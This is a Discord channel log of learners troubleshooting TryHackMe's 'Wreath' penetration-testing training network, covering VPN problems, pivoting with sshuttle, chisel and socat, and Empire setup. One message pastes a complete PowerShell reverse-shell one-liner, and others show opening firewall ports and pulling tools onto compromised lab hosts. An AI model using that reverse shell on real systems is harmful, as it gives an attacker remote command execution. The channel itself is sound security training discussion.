#wreath-network

1 messages Β· Page 10 of 1

winter lintelBOT
#

Gave +1 Rep to @safe meteor

civic stirrup
#

ok- pretty stoked I was able to 'curl' my way in to the next Task. I have a new found respect for the curl command;) Still curious why the rev shell didn't work but in this game, if one tool wont work, another way will;). We are hackers after all- gimme a piece of gum and a paperclip... MacGyver

rare snow
#

I wrote a pseudoshell on that one and used sshuttle and it worked

#

But the netcat thing looks weird, idk why it wouldn't work for you

stoic flicker
#

I should write a pseudoshell for that...but I'm lazy and it wasn't strictly necessary, though probably a bit stealthier

rare snow
#

Can u ping the web server?

dry pendant
#

check your vpn connection and also make sure the network is running

tacit frigate
#

check network and vpn fine... im having same issues connecting

#

unable to ping webserver

languid notch
#

having an issue with the sshuttle in task 18 and the firewall on the box, any clue how to solve ?

dry pendant
#

what's the issue?

languid notch
#
# Warning: iptables-legacy tables present, use iptables-legacy to see them
iptables v1.8.7 (nf_tables):  CHAIN_ADD failed (No such file or directory): chain OUTPUT
# Warning: iptables-legacy tables present, use iptables-legacy to see them
iptables: Bad rule (does a matching rule exist in that chain?).
fw: fw: error: fw: ['iptables', '-t', 'nat', '-D', 'OUTPUT', '-j', 'sshuttle-12300'] returned 1
iptables: Bad rule (does a matching rule exist in that chain?).
fw: fw: error: fw: ['iptables', '-t', 'nat', '-D', 'PREROUTING', '-j', 'sshuttle-12300'] returned 1
fw: fatal: fw: ['iptables', '-t', 'nat', '-I', 'OUTPUT', '1', '-j', 'sshuttle-12300'] returned 4
c : fatal: cleanup: ['/usr/bin/python3', '/usr/bin/sshuttle', '--method', 'auto', '--firewall'] returned 99````
rare snow
#

with what command are you running sshuttle?

languid notch
rare snow
#

ohh try to run the command with sudo or as root

languid notch
#

tried both

#

tried using the latest sshuttle from github also

dry pendant
#

did you need to edit your proxychains.conf for this? I can't recall which step that was required at

languid notch
#

no

rare snow
#

this was from the start in order to be able to access the hosts behind the webserver

#

If sshuttle doesn't work you can try another way to make a proxy or just do port forwarding using one of the other techniques

#

But you can often learn a lot by fixing a hard to fix issue

languid notch
#

I completed it without sshuttle, that wasn't the big issue, It was the recommended way, so wanted to try that too. So now I just need to fik that issue

open nebula
#

I cant connect to git server using remmina.Did anyone else encoountered the same issue??

scarlet sinew
#

I started the lab network but seems the server are not fully starting. :/
I don't get ssh or even web on the prod-serv.

river talon
#

Hi, cannot download vpn profile to access the network, after clicking "Download My Configuration File" I get 404 (Uh-oh, this page has been lost in the matrix.)

tropic quiver
#

Hey guy, I am a subscriber and I cannot see the buttons for starting the network. Also cannot ping the first machine. Any ideas? I am using the Attackbox.

blazing rock
river talon
winter lintelBOT
#

Gave +1 Rep to @blazing rock

fast geode
blazing rock
fast geode
hard mortar
#

fwiw I had the same problem trying to download a vpn pack for Throwback the other night

loud talon
# blazing rock Can you try to regenerate the ovpn file?

same problem here... I had the .ovpn file to connect to wreath network but it gives this error "2021-04-25 01:54:52 TLS Error: TLS handshake failed" so, I tried to regenerate a new .ovpn file, it regenerates but when I want to download a "404 Uh-oh" message appears to me too. 😦

chrome brook
#

anybody having issues with file upload to Personal-PC (task 40)?

I'm running curl http://my-ip:8081/nc.exe -o c:\\nc-NihilistPenguin.exe but it doesn't show up after I try to ls\dir the directory.

It is getting it from my http server tho:

digital tendon
#

do you have write permissions on C:\

chrome brook
#

oh, well that's a shortened example. I ran this for c:\windows\temp\...

merry robin
#

(Answer to that is no, btw)

#

If you're uploading it a directory that you can write to and it isn't working then it's getting picked up by defender

chrome brook
#

should defender be picking this obfuscated php up? I guess we gotta edit the reverse shell code ourselves so it's different from the example provided in the room?

chrome brook
#

anyways, network just reset and it works fine now, no clue what the issue was

stoic flicker
#

if so, I think there's some networking voodoo with the host windows machine that prevents sshuttle from working properly

hearty falcon
#

Hey .

#

I'm trying to a nmap scan on the machine but it's showing me thag the host is down

#

Is something like adding ip route required?

naive raft
#

Which machine?

covert sluice
#

Hello, I am trying to download the openvpn for wreath and it keeps loading to the Darth Vader - 404 Not Found page. Even after regenerating it I still get the same result.

dry pendant
#

maybe try using a different vpn region?

covert sluice
#

DIfferent vpn region for generally connecting to tryhackme? For the wreath network there is only the 'Wreath' option to choose.

dry pendant
#

ah, my mistake then. Sorry

covert sluice
#

No worries

naive raft
tropic quiver
#

In Access/Networks, it is written : "You don't have access to any networks". I don't get why so because I have both a paying account and a streak of more than 7. Any ideas?

strange bison
#

Did you join the room first?

tropic quiver
#

Yes and the room tells me I have 7 days left of access.

#

Ok, I just resolved my problem by leaving the room and joining back in ..

pallid vapor
#

look at pins

#

its not a bug

bright turret
#

any help ?

#

hey whatsup everybody .. i am doing wreath room Task 6 Webserver Exploitation , the exploit work just fine , the problem that i can not pwn a reverse shell to my machine , everything set just fine the port and the ip but i can't get connection i was using port 1337 and did not work so i changed it to 443 in order to work but no luck .. any help please?
thank u .

bright turret
#

ok then what ?

#

i guess i will just wait for someone to answer me

merry robin
#

Not every machine has netcat installed

#

Read the code -- it's near the top. Also, please don't try to ping everyone: it won't work, and makes you look really self-absorbed.

surreal sail
#

So I'm just starting with the Git Server enumeration, just so that I don't waste my time, what would be a good combo of nmap switches to use on the internal servers? Should I use the good ol -A -p- or would that be super slow?

strange bison
#

Certainly wouldn't do -A -p-

surreal sail
#

Yeah I figured that would prob be mega slow

#

to start out I guess I'll just run a simple nmap with no switches

#

see where that takes me

strange bison
#

I mean my standard is -p- -v -sV

#

If you're scanning over a pivot like SSHuttle, maybe not so great. Static nmap will be a bit better

bright turret
merry robin
#

Have a look at PayloadsAllTheThings on Github

#

There are many ways to get a reverse shell -- netcat is not a particularly good one either a lot of the time

bright turret
#

ok THANKS a lot

merry robin
#

Np πŸ™‚

naive raft
#

if needed, netcat binaries are downloadable.

#

i believe

bright turret
#

thanks ..but i am going to try something else than net cat

hidden cradle
#

On the gitstack part I have code execution on the server but it wont execute my powershell command :/

naive raft
#

What's the powershell command you are trying, the exact payload

#

@hidden cradle

hidden cradle
#

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("IP",53);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

naive raft
#

You didn't include your IP, you aren't using a port above 10000, and you need to url encode

hidden cradle
#

Well I include the IP when i'm actually doing it but why do I have to use a port above 10,000? And I didn't even think about the URL encoding part, thanks!

naive raft
#

Oh wait, I might be mistaken. One of the shells you are supposed to due to port scanning to not throw them off

hidden cradle
#

The initial network scan I did was for the top 15,000 ports.

naive raft
#

Oh ok, I might be confused, haven't done a few parts recently.

hidden cradle
#

hm even with URL encoding windows doesnt like my command.

naive raft
#

Send the URL

#

Like the payload

hidden cradle
#

It's just the URL encoded version of what I posted earlier with the right IP and port 12000

naive raft
#

I presume you have a proxy setup?

hidden cradle
#

Yes using ssshuttle even tried it using a script to generate an encoded powershell reverse shell but it don't like me

naive raft
#

What are you using, Curl or BurpSuite?

hidden cradle
#

neither just re-running the exploit

naive raft
#

Sorry about asking these basic questions, I promise I am not trying to be mean.

naive raft
#

The script can cause issues

hidden cradle
#

ok let me try

naive raft
#

I personally used curl however from what I have been told, both work

hidden cradle
#

I can execute basic commands like 'whoami' with the burp method but it still doesn't like my powershell commands. Usually this would work I thought

#

Gonna try again tomorrow thx for your help though

naive raft
#

Try curl -X POST - something to send data "PAYLOAD" url

blissful tartan
#

Firewall?

hidden cradle
#

Yeah that could be it will try netsh advfirewall firewall add rule name="TCP Port 4444" dir=in action=allow protocol=TCP localport=4444 or some variation

naive raft
#

Ye, the curl method is curl -X POST -d "PAYLOAD" $ip/web/exploit-username.php

naive raft
#

Hello, I have gotten Chisel on the Git Server, proxy all setup, everything connects. i do everything just like the video, and it returns a ERR_EMPTY_RESPONSE

open nebula
#

Am i the only one who is having problems in installing empire on kali?πŸ˜…

tardy bloom
surreal sail
#

I'm feeling a little overwhelmed by all the different types of port forwards and proxy, which should I start out with when playing around with the practical part of the pivoting?

merry robin
#

Sshuttle makes things easy.
If you're wanting to get into the nitty-gritty of it, I would suggest messing around with SSH tunneling though. That helps a lot with understanding

surreal sail
#

Hey, I cannot connect to the first host with SSH... I just downloaded the private key and changed it's permission, but I still getting this error. I've checked the key and there are no spaces on it. I've also waited for the network to restart, but the error still there. Could anyone help me?

meager atlas
#

I would change the command to this: ssh -i id_rsa root@10.200.93.299 but I am not shure if this helps

hidden cradle
#

@surreal sail I assume you did chmod 600 id_rsa as well to the key?

surreal sail
#

Sure

surreal sail
hidden cradle
#

I would delete the key, and grab it again if it still doesn't work then box needs to be reset

surreal sail
#

I did this yesterday, I waited until today for the box to be reseted but still getting the problem =/

#

I also tried to generate a key and add to authorized_keys on the box, but I don't have permission to write in this file

hidden cradle
#

Is your vpn working fine? no connection errors? Is your kali box updated?

stoic flicker
#

there shouldn't be any newlines at the end either.

meager atlas
#

Maybe this is not the complete key

surreal sail
#

I'm using my Debian, but i'll check for \r\n

#

Hmm, I did sed -i 's/\r//' id_rsa, no results

surreal sail
#

Could anyone try to connect to the box with the private key? So that I can know whether the problem is here or there

meager atlas
#

Maybe the Key was new generated

surreal sail
#

Oh

#

I just sent the private key to my machine with /dev/tcp and it worked

#

Probably I was copying with some badchar

#

Thank you all for the support πŸ™‚

#

In the end, the problem was the newline I deleted haha

deft quartz
#

im having trouble with "
What command would you use to connect back to this server with a SOCKS proxy from a compromised host, assuming your own IP is 172.16.0.200 and backgrounding the process?"

hidden cradle
#

Which task is that

deft quartz
open nebula
#

but it seems that both pip2 and pip3 are installed in python3 in my distro

hidden cradle
#

@deft quartz It continues from the first question if that helps at all which is a server and since this is a server/client connection that should tell you what the answer should be.

hidden cradle
#

good

deft quartz
#

[root@prod-serv ~]# curl 10.10.178.77:8080/nmap-y33t3rs0n -o /tmp/nmap-y33t3rs0n && chmod +x /tmp/nmap-y33t3rs0n
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- 0:00:23 --:--:-- 0

#

should it do this?

winged parcel
#

hey sorry to bother you, I know you are super busy, any news on that?

merry robin
#

I spoke to the last person yesterday (sorry -- took ages to get hold of them). The go-ahead for prizes has been given, but not sure if it's been seen yet πŸ™‚

winged parcel
#

oh cool!

#

ty

stoic flicker
#

oh right wreath writeup...

hidden cradle
#

Can't get starkiller working, just installed empire manually. sudo ./empire --headless & then I visit https://localhost:1337/ accept security warning and then its a blank page

pallid vapor
#

also dont just go there, use starkiller

hidden cradle
#

OH lol I didn't start starkiller whooops

#

oh yeah if anyone needs a quick command to get their tun0 ip can do ifconfig tun0 | awk '$1 == "inet" {print $2}'

pallid vapor
#

or uh

#

thats how the attackbox gets it iirc

hidden cradle
#

gotcha

open nebula
#

i get this error even after installing flask

pallid vapor
#

check if youre using python3 or python2

open nebula
#

is this an issue.

pallid vapor
#

no

#

try python3 -m pip install Flask

open nebula
#

tried.Look

#

when i try to run install.sh for empire.I get this error .Package python-pip is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
However the following packages replace it:
python3-pip

E: Package 'python-m2crypto' has no installation candidate
E: Package 'python-pip' has no installation candidate

pallid vapor
#

idk

dry pendant
#

Running as root might not be helping

pallid vapor
#

no no you have to

open nebula
#

tried everything nothing seems to work

#

when i try to intsall m2cryto it tells me that requirement is already satisfied

hidden cradle
#

You know what would be nice is if we got 2hrs of time on the wreath network instead of 1hr so I don't have to go back and forth on the time

strange bison
#

You don't have limited time on the network

hidden cradle
#

I know buuut

pallid vapor
#

its expensive to run so iirc its better for thm that way :)

hidden cradle
#

Do they run their stuff on AWS or something?

pallid vapor
#

yep

hidden cradle
#

Confused on the Empire part, so for the webserver the .200 it acts as a 'jump server' for my connections to .150 so I make a listener and http_hop listener for .200. Transfer the files to the webserver. Serve them up on the php server thing. THen on the gitserver .200 I use the exploit for gitstack to execute my url encoded powershell stager payload. Except I don't get an agent back. And I did open up the ports on .200 & .150

pallid vapor
#

keep trying, but if it doesnt work and you tried everything you can skip the empire part.

blissful tartan
#

Just completed this room. Learned a lot! Thanks @merry robin πŸ‘

winter lintelBOT
#

Gave +1 Rep to @merry robin

slender heron
#

hi

hot cobalt
#

Hai

half spoke
#

Hi guys!

.200 working for you?

#

I am unable to get the ping back! I have tried to reconnect the VPN but still not working

half spoke
#

install via this, it will satisfy all the requirements

surreal sail
#

Hi everyone! On task 36 personal PC Exploit Poc I'm able to go to the website IP .100 but when I try to go to the /resources folder it keeps loading without showing me the authentication required....I'm I missing something?

dry pendant
#

There are many different instances of the wreath network. The third octet of the IP shows which instance you are on. If you can't ping or connect to the network, double-check to make sure the network is running.

strange bison
#

Also make sure you're on the Wreath specific VPN

surreal sail
#

Already tried everything... I'm unable to get to /resources....Network running, website available but not the resources folder...

#

ok...stupid me...I forget to turn on foxyproxy...

thorny arch
#

That network provides insane learning points to beginners, props to those that created it, it was a very lucrative room

merry robin
#

Aha, this one was my baby.
You are most welcome @thorny arch πŸ™‚

sweet rune
#

why does it show that i have only one day of access left to the wreath network?

tranquil river
#

@sweet rune you can only be in the wreath room for 10 days. After that you have to rejoin it, and the network won't be the same as you left it - you'll have to exploit again etc.

sweet rune
#

thank you

surreal sail
surreal sail
winter lintelBOT
#

Gave +1 Rep to @merry robin

tribal lantern
#

hie guys i have been failing to access the webserver,when trying to connect via ssh my machine is saying no route to host

#

+] Stable internet connection
[+] OpenVPN is installed
[+] tun0 exists
[+] tun0 IP is in the correct range
[+] Only one instance of OpenVPN is running
[+] Confirming connectivity
[-] Something went wrong -- please ask for further assistance in the TryHackMe Discord server, subreddit, or forum

dry pendant
#

First thing that comes to mind is that you might not be on the "Wreath" vpn. It's a separate vpn file that you have to download and execute. Second thing is making sure that the network is up.

tribal lantern
#

i am currently connected but i don't know were am getting it wrong

dry pendant
#

And the network is running? are you able to ping or nmap the .200 machine?

dull pendant
#

getting the same error as Guveya now

#

Network is running, openVPN access shows i'm connected to Wreath Network. unable to ping .200 machine

kind parrot
#

can't connect either from my linux or attackbox

#

this might be signal for us to stay away from our computers during the weekend and enjoy air outside πŸ˜‹

stiff karma
dull leaf
#

Ummm i need to close the network

#

But

#

There seems no way

#

Should i leave it be

#

Its got around 1.25 hrs left on it.

merry robin
#

If this is all the same subnet, try to go for a reset. Chances are someone shut a box down manually πŸ™‚

dull pendant
#

It's working fine for me now, wasn't reset

ebon kite
#

my vpn file didnt work and cannot regenerate a new one

dull pendant
ebon kite
#

i just returned to the room today

merry robin
#

Remember there's a 10 day limit on it, so you may need to rejoin

ebon kite
#

I've rejoined it for 5 hours and it still not work, pls help

open nebula
winter lintelBOT
#

Gave +1 Rep to @half spoke

kind parrot
#

Hi guys, i am doing Task 20 Git Server Exploitation. I want to setup the "socat relay from .150 thru .200 to my attacking linux". got difficulties can't see any respons after i send POST request from burp. Need support please

merry robin
#

@kind parrot WSL doesn't play nice with networking, so that might have something to do with it. Also check the firewall on 200. If you can netcat from your host to 10.200.84.200:15100 then you know that bit is fine

surreal sail
#

Hey, quick question

#

what does this mean?

merry robin
#

It means you have 3 days of access left

surreal sail
#

And then?

#

wdym

merry robin
#

Check the pins :)

surreal sail
#

Thanks

#

Have a nice day

kind parrot
tranquil briar
#

Hey all.. I was wondering if anyone was able to run mimikatz on git-serv without RDP? I was trying to complete this task with use of only terminal. I tried uploading an Msfvenom and relay my rev shell through socat which went fine but couldn't bypass UAC to run mimikatz, also tried a few powershell privesc techniques but no success

#

Really just wondering if anyone was able to do this?

lyric bane
tranquil briar
#

I'm thinking you might be right.. I tried the kiwi module aka mimikatz with metasploit but same result because I couldn'y bypass UAC

lyric bane
#

Did you try invoking incognito?

tranquil briar
#

yeah went through a few option.. getsystem, incognito used some powersploit modules but nothing

fickle frost
#

Wreath Network

zealous blaze
#

I need help In wreath task 5 I am not able to access the website when I am typing the IP address of the machine

elder hemlock
#

/hacking

zealous blaze
elder hemlock
#

xd

idle holly
#

Configuration File cant be downloaded even after Regen ?

stoic flicker
stoic flicker
#

memory serves it's running a centos, so you should use firewall-cmd

stoic flicker
stoic flicker
zealous blaze
stoic flicker
#

It may be wanting you to set a host

swift canopy
#

I've been trying to download the vpn for wreath but its redirecting to error page
I tried to regenerate it too but it's still redirecting to error page

#

Any idea what to do?

modern copper
#

I downloaded yesterday without problems.

#

but it might be a system glitch right now. I have had a few times with timeout from the site today

tacit frigate
#

anyone free to help me with a chisel forward proxy?

#

think im missing something here

#

lol nevermind just read the hint

#

doh

tranquil briar
stoic flicker
#

let me check my notes

tranquil briar
#

yeah if you have any ideas that be great

stoic flicker
#

ah yeah you need RDP as you need the admin shell

tranquil briar
#

Indeed.. but that said I'm just not the type to give up trying to bind an alternative easily, I feel there must be some method to bybass uac

stoic flicker
#

get a shell as NT Authority/System

tranquil briar
#

thats's the hope... wish me luck lol

tranquil briar
#

finally got it! required multiple socat relays to relay multiple metasploit sessions

tranquil briar
#

Am I allowed to divulge the method I used to run mimikatz without RDP here?

dull pendant
#

Is there a certificate given for Wreath Network? Or only a badge?

pallid vapor
#

only a badge

merry robin
#

Metasploit (or another C2) would be the way to do it

tranquil briar
# merry robin Go for it πŸ™‚

I'll export my cherry tree node to PDF and and put it on github rather than writing another novel in the server and anyone who wants to can check it out there

kind parrot
#

With your report written and proof-read, you send the PDF to Thomas then sit back and relax, your work is done!

dull pendant
winter lintelBOT
#

Gave +1 Rep to @pallid vapor

kind parrot
#

what a super cool room!

tranquil briar
pallid vapor
#

cool :)

frank raptor
#

Someone who can help me with task 40, I am having trouble receiving the revshell, I can upload netcat but I am not getting a reverse shell ..

dry pendant
#

any errors?

frank raptor
# dry pendant any errors?

Nop, it just does not give me the connection, I can upload the webshell, netcat without problems, but the revshell does not work

dry pendant
#

which machine did you upload it to?

frank raptor
dry pendant
#

.200? .150?

frank raptor
dry pendant
#

my first guess, from looking at my notes, is that maybe you didn't compile the nc binary correctly

frank raptor
winter lintelBOT
#

Gave +1 Rep to @dry pendant

dry pendant
#

You're welcome. Glad you got it fixed, sorry I wasn't helpful

frank raptor
swift canopy
frigid elk
#

from pinned msg,

You can rejoin at any time though, and your progress in the room isn't reset. You also shouldn't need a streak/sub to rejoin once you've been in there once; but you will need to redownload the VPN connection pack

My 10 days of access ended but I am unable to download new vpn connection from access page. I am getting You don't have access to any networks. Is the streak/sub mandatory now?

pseudo basin
#

hey im on task 30 and i was trying to experiment with the different modules using empire's framework cli. It says that my agent ran the script but i don't know where to actually find the output. The script in the example gave the output directly to me but winPEAS doesn't.

frank raptor
#

I have finally finished the Wreath room, everything that this room has taught me has been incredible, thank you @merry robin for creating this room it has been an incredible experience!

winter lintelBOT
#

Gave +1 Rep to @merry robin

tardy bloom
#

So when will the winning reports for Wreath be announced or featured on the site? @merry robin

merry robin
#

Very soon πŸ™‚
Winners should already have been contacted. I'm going to announce them at the same time as the YotJF winners

serene flicker
#

( this might be a stupid question. apologies in advance ) while doing wreath ( Task 17 git server enumeration ) I got a some extra ports open, which doesn't seem to be the case in most writeups and the walk-through by dark. don't really know why?

#

Nmap scan report for ip-10-200-86-150.eu-west-1.compute.internal (10.200.86.150) Host is up (0.00054s latency). Not shown: 6144 filtered ports PORT STATE SERVICE 80/tcp open http 135/tcp open epmap 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server 5985/tcp open wsman MAC Address: 02:4D:36:4B:4F:07 (Unknown)

frank raptor
serene flicker
#

is it because some one was running SMB? that's all I could get from the port numbers.

hard mortar
#

it's possible someone could have disabled the firewall(?)

frank raptor
#

so everyone remembers, DO NOT open such low ports, use ports from 15000 onwards, for everyone's sake, also remember to close the smb service when you are no longer using it

merry robin
#

15,000

digital tendon
#

hey @merry robin I submitted a PDF writeup for this, but I was wondering if you would mind me making a kind of 'attack narrative' only one for my own hosting?

#

just because the network used a lot of techniques I'd like to showcase if i ever put my github pages on my linked in

merry robin
#

Aye, of course

digital tendon
#

cool! thanks

frank raptor
cyan vine
#

Hey!

If you have a Wreath VPN configuration 404 issue upon download could you ping/ DM me.

forest vapor
#

Hello,
For task 13 (socat) the example to uses netcat (the version with -e). I'm sorry if I missed it but where's the link to download the static binary for that ?
(please ping me πŸ™‚ )

hard zodiac
#

Hi, anyone else having problems with connecting to network? It went to sleep and i booted it back again but now i cannot connect to anything. Am i doing something wrong?

high hornet
merry robin
#

Np! πŸ˜„

vale smelt
#

Hello @cyan vine ,
I have a Wreath VPN configuration 404 issue upon download, could you help me ?

cyan vine
vale smelt
winter lintelBOT
#

Gave +1 Rep to @cyan vine

zinc furnace
#

any reason why vpn is not connecting to the vpc

#

stuck here for a time

surreal sail
#

umm i am not able to download.. my openvpn file

#

this is what is being shown

oblique crag
#

Please no admin pings ❀️

#

With that, please regenerate it once more

#

You might have to log out and log back in

surreal sail
#

sorry

#

its down

#

i cant

#

still

surreal sail
surreal sail
#

still

#

its down

#

cant download

oblique crag
#

You have to give it a few seconds between clicking the regenerate button and attempting to download it

surreal sail
#

yea i ve been trying since past 1 hour

#

and its like.. uk.. making me mad

#

so

#

naa

#

nvm

oblique crag
#

Please email support, I understand your frustration but the admin pings were entirely unnecessary

surreal sail
#

m sorry.. didnt mean to.. irritate

#

thanks for the reply

zinc furnace
#

guys .....

pallid vapor
#

restart your vpn and check network is up

zinc furnace
#

already done 3 times

tropic heath
#

Yo

#

Someone fucked up the network

#

No ping no response or anything at all

tropic heath
#

I'm from the attack box, which always works... Not this time

pallid vapor
#

theres different instances of the network...

#

so one person cant mess up the whole thing

#

try a reset

tropic heath
#

All instances have the same IP?

strange bison
#

no

tropic heath
#

Cuz I have the same one as the screenshot above

#

10.200.84.200

#

I voted to reset the network

frigid elk
delicate spindle
#

Hello everybody. Sorry to bother u but I have this little issue with port scanning the last machine of the network

#

I launch this command: Evil-WinRM PS C:\Users\Administrator\Documents> Invoke-Portscan -Hosts 100.200.87.100 -TopPorts 50

#

and I get:

#

Hostname : 100.200.87.100
alive : False
openPorts : {}
closedPorts : {}
filteredPorts : {}
finishTime : 5/8/2021 10:36:56 AM

#

any idea why?

#

Evil-WinRM PS C:\Users\Administrator\Documents> arp -a

Interface: 10.200.87.150 --- 0xa
Internet Address Physical Address Type
10.200.87.1 02-76-be-e3-c3-c1 dynamic
10.200.87.100 02-52-59-7f-a0-01 dynamic
10.200.87.200 02-ab-08-16-2c-5b dynamic
10.200.87.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.251 01-00-5e-00-00-fb static
224.0.0.252 01-00-5e-00-00-fc static
255.255.255.255 ff-ff-ff-ff-ff-ff static

forest vapor
#

Compare your command with the result of arp -a

delicate spindle
#

Maybe I was tired!! Thank you so much

forest vapor
#

No problem, I was stuck for 20 minutes yesterday because I forgot to start sshuttle again πŸ˜„

eternal sundial
#

hi someone know if the wreath lab finish in 6 days? appear me 6 days of access left

#

later will be paid?

naive raft
#

Nope, you own have a certain amount of days in the room, before it expires. Once it expires, all you have to do is rejoin the room, sadly it will clear all your progress.

nocturne bison
naive raft
nocturne bison
naive raft
#

Only because you get put on a different subnet.

zinc furnace
#

wth for 1 hr i was thinking git server machine was a linux system πŸ˜†

dry valve
#

hello everyone, i have an issue in Task 32

#

the session is created but i can't connect to the server

#

i tried with Foxyproxy and Proxychains but none worked

#

[proxychains] Strict chain ... 127.0.0.1:9050 ... 10.200.88.100:80 <--socket error or timeout!
curl: (7) Couldn't connect to server

dry valve
#

I think there is a problem with that host

#

Evil-WinRM PS C:\Users\Administrator\Documents> Invoke-Portscan -Hosts 10.200.88.100 -TopPorts 50

Hostname : 10.200.88.100
alive : False
openPorts : {}
closedPorts : {}
filteredPorts : {}
finishTime : 5/9/2021 3:00:44 PM

#

Interface: 10.200.88.150 --- 0xe

10.200.88.1 02-56-a3-18-e9-ef dynamic
10.200.88.100 02-46-02-ae-ed-03 dynamic

merry robin
#

Go for a reset. Looks like someone shut it down

bright wave
#

@merry robin on your opinion who make the best pentest report from wreath?

merry robin
#

I really need to announce the winners. They should all have been notified -- just waiting for the YotJF results too

bright wave
#

Just wanna know which want is the best to emulate πŸ™‚

stoic flicker
#

Still need to write mine :(

cold finch
#

I'm addicted to socat now, all thanks to muiri πŸ˜„

stoic flicker
#

Socat is great

merry robin
#

Socat is wonderful

stoic flicker
#

Bow before socat!

supple pine
#

Pls i need the vm I'm working on to be reset

#

currently 7/8 votes

#

πŸ₯Ί

merry robin
#

What octet?

supple pine
#

10.200.86.x

cold finch
#

It did get reset yesterday.

cold finch
#

Lmao πŸ₯΅

lethal verge
#

Hey guys, I'm at task 34 but the download rate is really really slow. It's been almost one hour and I downloaded only 2 folders. Any tips?

forest vapor
#

So, I finished Wreath recently. And before going after Throwback I'd like to make sure everything is clear in my mind. I made this (ugly) draft of how things go networking wise could anyone tell me that this is correct ?
It's only a draft on MSPaint, I'll make it clean and beautiful with Visio

jagged lion
#

ughhhhhh

#

I think you’re kind of over complicating it

#

I mean if it helps you it helps you but that seems like it would just confuse you more

#

I mean I develop networks and that confuses me

blissful blaze
#

Did you figure this out? I may have been spraying the admin login page and lock things up. I'm not sure what to do now

#

I think I figure id out - the ip changed after the initial enumeration

dry pendant
supple pine
#

I'm having issues getting the http_hop to work

#

running the generated payload doesn't work

#

i even tried running it directly on the gitserver shell

#

I get all bunch of errors

#

mainly RemoteException

#
  • FullyQualifiedErrorId : NativeCommandError
oblique oar
#

i'm tryna transfer my private key over to the target on task 11
i can connect via ssh, however when i try to scp i get permission denied?

#

ffs nvm

#

moving the flag before my file works

strange bison
#

Yep

#

SCP is weird like that

rigid lynx
#

Hey, is there anyway that I can increase the wreath network access time?

hard mortar
#

leave and rejoin

rigid lynx
#

before the time is over? or after the days left for me in the room?

#

It says I have 1 day left

#

but I moved slow due to streaming it on twitch almost daily... And I have 1 day left for AV and further task

strange bison
#

You just need to rejoin once your time expires

rigid lynx
#

sure thing πŸ˜‰ Ohh btw, will it reset my progress? I guess no?

strange bison
#

It'll likely be a new network, but your answers won't change

rigid lynx
#

ohh alright... thanks πŸ‘

pallid vapor
#

itll be the equivalent of resetting it basically

trim sentinel
#

Hi in Task 18 Pivoting I use: sshuttle -r root@10.200.86.200 --ssh-cmd "ssh -i sshkey" 10.200.86.0/24 -x 10.200.86.200 and it says connected, but I dont get a connection to 10.200.86.150 over sshuttle. When I ssh into the machine it works

forest vapor
trim sentinel
rigid lynx
# trim sentinel I tried to make service detection with nmap

Well when u used that command above.... you got into the network as prod-serv... If u try to run nmap on ur attacker machine... It is going to be slow... But will allow u to scan .150

Sshuttle will allow u to connect to .200 and access .150 as server for || gitstack|| but does not gives u shell access on .150

#

For that u need to retrieve password hash of a user residing on gitsever.thm and then connect via either RDP or evil-winrm

zinc furnace
#

@trim sentinel well on 150 machine it is better to use ||evil win-rm|| but even before that you have to find the creds and do some stuff with the firewall

#

@merry robin thx man for this awesome network really cleared many concepts

winter lintelBOT
#

Gave +1 Rep to @merry robin

trim sentinel
#

thx got it now

open nebula
#

I installed starkiller and empire as it is from the offcial walkthrough but when i ran starkiller I have no listnere types available.

#

thanks in advance

zinc furnace
#

@open nebula check the empire does it is showing some error code , personally it's better to use pwncat and upload scripts by yourself

pallid vapor
#

pwncat! :))

kindred nacelle
#

Hi guys, I have some problems reaching /resources in Task 36 I can reach the page directly with the ip.100 but can't get further. I am using an sshutle to the prod-serv and go with evil-winrm into the git-serv to start the chisel server with socks5 and with the firewall port i opened on the git-serv, my chisel client locally is working fine and connecting to the chisel server on the git-serv. FoxyProxy is active in chrome and firefox set as my chisel listening port to socks5 as mentioned I can reach the Main Page and when navigating to /resources I get the Login prompt after typing in my previously found credentials it seems to be loading but won't connect me to the page, any ideas?

dry pendant
#

Make sure your proxy in firefox is configured as a socks proxy, not http. That's my first guess without going back and re-reading my notes.

kindred nacelle
#

thanks for the fast reply, that's the case in both firefox and chromium, furthermore wouldn't I don't even get the login prompt then? πŸ€”

#

I re-read that, that makes not that much sense, let me rephrase it. Shouldn't I then not get the login prompt at all?

dry pendant
#

Good point. Yeah, without re-reading the room and my notes, I am not sure offhand. Sorry

kindred nacelle
#

np thanks for the idea πŸ™‚

dry pendant
#

you're welcome

latent plume
#

Just finished Wreath πŸŽ‰ Learned some new stuff for sure. Great stuff πŸ™‚

kindred nacelle
merry robin
kindred nacelle
# merry robin Make sure you have the correct creds

Thanks for the reply Muiri, if I understand it correctly it should be the credentials of Task 21 which I tried, using the user found (Txxxxx) and as the password the cracked NTLM Hash of this user. Unfortunately up till now this has not worked for me.

winter lintelBOT
#

Gave +1 Rep to @merry robin

merry robin
#

It should be. Yes.
That's odd -- it's got to be something to do with the proxy, if it isn't loading at all. Check to make sure it's a socks5 proxy on the right port

kindred nacelle
#

Well thats the odd thing, the main page loads correctly, and navigating to /resources triggers the login prompt, Chisel server is active trough Evil-winRM set as socks5 with the opened Firewall Port, chisel client locally as socks listening to the opened Port and forwarding it to my local port and my FoxyProxy in FireFox or Chrome is set to Socks5 with the corresponding local port configured in chisel client.

merry robin
#

That all sounds correct. Very strange

kindred nacelle
#

I think so as well, as I am out of ideas now I will try to access /resources on another client with a bare metal install of kali maybe something in my Main OS blocks my VM from accessing resources. I can't imagine that it does, as everything should be set up to not interfere,
but well I am at my wits end here πŸ˜…

kindred nacelle
#

